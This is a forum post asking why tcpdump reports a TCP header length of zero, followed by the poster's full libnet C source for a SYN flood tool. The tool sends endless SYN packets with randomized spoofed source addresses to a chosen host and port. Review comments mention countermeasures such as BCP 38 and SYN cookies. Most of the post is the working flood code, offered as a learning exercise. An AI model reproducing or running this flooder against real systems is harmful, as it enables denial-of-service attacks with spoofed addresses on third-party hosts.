tcp hdr length

Hello,
This is my first topic here. I hope my problem is pretty simple and that you'll be able to find a solution. So here is my problem:

This is the tcpdump output from my Ethernet card after I run my program (it is harmful because it is a SYN flood, but I use it to learn how TCP raw sockets work on Linux):
./synflood 192.168.0.2 21

tcpdump port 21:

19:23:43.669095 IP (tos 0x10, ttl 106, id 49310, offset 0, flags [none], proto TCP (6), length 40) 252.5.85.76.10034 > 192.168.0.2.21: tcp 20 [bad hdr length 0 - too short, < 20]
(each packet gives same error)

And that's the code:

#include <libnet.h>

#define FLOOD_DELAY 5000 // pause between packets; passed to usleep(), which takes microseconds, so 5000 us = 5 ms (not 5000 ms)

/*
 * Render an IPv4 address as dotted-quad text ("x.x.x.x").
 *
 * ip_addr_ptr points at a u_long whose leading bytes hold the address laid
 * out as a struct in_addr. Only sizeof(struct in_addr) bytes are read through
 * the cast, even on platforms where u_long is wider.
 *
 * Returns inet_ntoa()'s result: a pointer to a static buffer that the next
 * inet_ntoa() call overwrites, so the caller must not free it or hold on to
 * it across calls.
 */
char *print_ip(u_long *ip_addr_ptr) {
   struct in_addr *addr = (struct in_addr *)ip_addr_ptr;

   return inet_ntoa(*addr);
}


/*
 * Entry point. Takes <host_dst> <port_dst>, opens a raw IP socket through
 * libnet, then loops without a break: each iteration builds one IP header
 * plus one TCP header (LIBNET_IP_H + LIBNET_TCP_H bytes, no payload) with
 * only TH_SYN set, checksums it, writes it, and sleeps FLOOD_DELAY.
 *
 * Traffic profile as set below: source address, source port, IP ID, TTL,
 * sequence number, acknowledgement number and window are taken from
 * libnet_get_prand() for every packet; destination address and port are
 * fixed; TOS is IPTOS_LOWDELAY; the total length is constant (the tcpdump
 * line posted with this listing shows length 40).
 *
 * NOTE(review): the source address is a random 32-bit value, so it does not
 * belong to the sending host and can land in reserved space (the posted
 * capture shows 252.5.85.76). Source-address validation at the network edge
 * (BCP 38) and SYN cookies on the listener are the usual controls for this
 * pattern.
 *
 * NOTE(review): the posted capture reports "bad hdr length 0 - too short,
 * < 20" for every packet, i.e. tcpdump decodes the TCP data-offset field as
 * 0. Nothing in this block writes that field directly.
 */
int main(int argc, char *argv[]) {
   u_long dest_ip;
   u_short dest_port;
   // errbuf is declared but never referenced in this function
   u_char errbuf[LIBNET_ERRBUF_SIZE], *packet;
   // opt is declared but never used; packet_size covers both headers, no payload
   int opt, network, byte_count, packet_size = LIBNET_IP_H + LIBNET_TCP_H;

   if(argc < 3)
   {
      printf("Usage:\n%s\t <host_dst> <port_dst>\n", argv[0]);
      exit(1);
   }

   // Resolve the target; the return value is not checked for a resolution failure.
   dest_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE); // host
   // atoi() reports no errors, and the cast truncates the result to u_short.
   dest_port = (u_short) atoi(argv[2]); // port


   // Raw socket: the message below assumes a failure means missing privileges.
   network = libnet_open_raw_sock(IPPROTO_RAW);
   if (network == -1)
      libnet_error(LIBNET_ERR_FATAL, "superuser privileges required to create raw sockets.\n");

   libnet_init_packet(packet_size, &packet); // allocate packet memory
   if (packet == NULL)
      libnet_error(LIBNET_ERR_FATAL, "fail to allocate packet memory.\n");

   libnet_seed_prand(); // random generator seed

   printf("Flooding  SYN port: %d host: %s..\n", dest_port, print_ip(&dest_ip));
   while(1) // (exit on CTRL-C)
   {
         // IP header is written at the start of the packet buffer.
         libnet_build_ip(LIBNET_TCP_H,      // size of the packet sans IP header
         IPTOS_LOWDELAY,                 // IP tos
         libnet_get_prand(LIBNET_PRu16), // IP ID (randomized)
         0,                              // frag stuff
         libnet_get_prand(LIBNET_PR8),   // TTL (randomized)
         IPPROTO_TCP,                    // transport protocol
         libnet_get_prand(LIBNET_PRu32), // source IP (randomized)
         dest_ip,                        // destination IP
         NULL,                           // payload (none)
         0,                              // payload length
         packet);                        // packet header memory

      // TCP header is written immediately after the IP header.
      libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // source TCP port (random)
        dest_port,                      // destination TCP port
         libnet_get_prand(LIBNET_PRu32), // sequence number (randomized)
         libnet_get_prand(LIBNET_PRu32), // acknowledgement number (randomized)
         TH_SYN,                         // control flags (SYN only)
         libnet_get_prand(LIBNET_PRu16), // window size (randomized)
        0,                              // urgent pointer
        NULL,                          // payload (none)
        0,                             // payload length
        packet + LIBNET_IP_H);          // TCP header memory, after the IP header

      // Compute the TCP checksum; the "CRC" in the message refers to this checksum.
      if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1)
        libnet_error(LIBNET_ERR_FATAL, "CRC fail\n");

      byte_count = libnet_write_ip(network, packet, packet_size); // inject packet
      // Short write is only a warning; the Polish text in the format string reads "%d of %d bytes".
      if (byte_count < packet_size)
        libnet_error(LIBNET_ERR_WARNING, "Warning: Packet was not correct.  (%d z %d bajtów)", byte_count, packet_size);

      usleep(FLOOD_DELAY); // pause FLOOD_DELAY microseconds before the next packet
   }

   // Not reached: the loop above has no break, so this cleanup never runs.
   libnet_destroy_packet(&packet); // free memory of packet

   if (libnet_close_raw_sock(network) == -1) // close
      libnet_error(LIBNET_ERR_WARNING, "unable to close connection.");

   return 0;
}